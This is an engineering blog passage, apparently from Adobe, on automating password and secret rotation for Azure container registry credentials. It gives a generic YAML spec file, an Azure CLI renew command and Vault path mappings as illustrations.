But there is a better approach to password rotation: look at this as a coding problem with a coding solution. What do I mean by this? By automating the rotation of secrets through code that runs in the background, no engineering resources are required to manually enforce password rotation and no users are burdened with having to remember to rotate passwords. It’s potentially a win – win. Security organizations can help avoid human error, reduce the time to enforce or fix problems, improve adoption of better password security and, perhaps most importantly, help ensure compliance and make quarterly compliance reviews less tedious. 

At Adobe, we’ve implemented an automated secret rotation process for certain categories of user accounts, as well as through a pilot project within one of our teams for shared infrastructure resources. 

In general, here is how it works:

First, you create a spec file that includes scripts for two processes: rotating the passive secret (Step 1 in the diagram below) and applying the new passive secret to the active key (Step 2 below).

To rotate a passive secret for the Azure container registry, the code in the spec file would look something like this (NOTE: all examples shown are generic and for illustrative purposes only):

azure:
container_registry:
- name: testregistry
active_key_value: “{{ docker_acr_repo_password }}”
passive_key_path: ‘IO_XT/qcrdemo:container_registry_passive’
resource_group: “test-resource-group”

Next, you would leverage the AWS and Azure command line interfaces to rotate the passive secret to the new value. For example:

az acr credential renew -n testregistry --password-name password2

Finally, you need to apply the newly rotated passive secret to the active key. The spec file code for that process looks like this:

_vault:
common:
address: https://your_vault_address
mount_point: kv
namespace: your_vault_namespace
version: 2
paths:
artifactory_corp_username: 'test/Artifactory/corp:username'
artifactory_corp_password: 'test/Artifactory/corp:password'
az_sp_passsword: 'test/Azure_Credentials/nonprod:az_sp_passsword'
az_sp_tenant: 'test/Azure_Credentials/noprod:az_sp_stage_tenant'
az_sp_user: 'test/Azure_Credentials/noprod:az_sp_user'
docker_acr_repo_password: 'test/qcrdemo:container_registry_active'

One more note: this approach can be accomplished in many ways, including through customized implementation of open-source secrets storage tools, and/or through use of whatever other secure storage mechanisms makes sense for your company. And no matter where you choose to store your secrets, by treating security – and password rotation – as code, you can help improve security across your organization.

Shikha Chawla
Software Development Engineer, Platform





Latest Images